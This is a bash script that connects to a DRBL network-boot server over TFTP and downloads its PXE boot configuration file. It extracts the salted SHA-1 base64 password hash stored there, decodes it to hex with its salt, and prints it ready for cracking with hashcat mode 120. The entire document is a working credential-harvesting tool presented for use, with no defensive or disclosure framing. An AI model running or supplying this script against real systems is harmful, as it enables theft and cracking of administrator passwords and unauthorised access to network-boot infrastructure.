#!/bin/bash # v0.1 # Script downloads file tftpboot/nbi_img/pxelinux.cfg/default from TFTP server # and extacts SHA1 base64 encoded salted hash SHA-1(Base64) e.g. $4$12345678$dNrwSpMlsrKw/0oqW5LuUv1750o$ # $4$ - SHA-1 base54 encoded salted hash type # salt - 12345678 # hash - dNrwSpMlsrKw/0oqW5LuUv1750o # Script converts SHA-1(Base64) hash to sha1($salt.$pass) hash and stores it to file hash_decoded.txt function checkbin { for binary in tftp base64 hexdump; do type -P "$binary" &>/dev/null [ "$?" != 0 ] && echo "$binary needed but not found, exiting" && exit 1 done } function downhash { i=1 while [ "$i" != 0 ]; do echo -n "Enter IP address of DRBL server: " read ip echo "$ip" | grep "[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}" &>/dev/null [ "$?" == 0 ] && i=0 done echo "Downloading file '/pxelinux.cfg/default' from TFTP server: $ip, please wait" tftp -v "$ip" -c get /pxelinux.cfg/default &>/dev/null [ "$?" != 0 ] && echo "Can't connect to TFTP server: '$ip', exiting" && exit 1 grep '\$4\$' default &>/dev/null if [ "$?" != 0 ]; then echo "TFTP connection succesfull but hash not found, exiting" rm default exit 1 else grep '\$4\$' default | cut -d " " -f4 > hash_sha1.txt rm default fi } function prephash { [ ! -f hash_sha1.txt ] && echo "File 'hash_sha1.txt' not found, exiting" && exit 1 salt="$(cat hash_sha1.txt | cut -d '$' -f3)" hash64="$(cat hash_sha1.txt | cut -d '$' -f4)" echo "SHA-1 base64 encoded and salted hash: $hash64=" hashexa="$(echo -n "$hash64"= | base64 -d -i | hexdump -v -e '/1 "%02x" ')" echo "SHA-1 hexa encoded hash: $hashexa" echo echo "+++ Please run hashcat with parameter -m 120 and following hash +++" echo "$hashexa:$salt" > hash_decoded.txt && cat hash_decoded.txt exit 0 } checkbin downhash prephash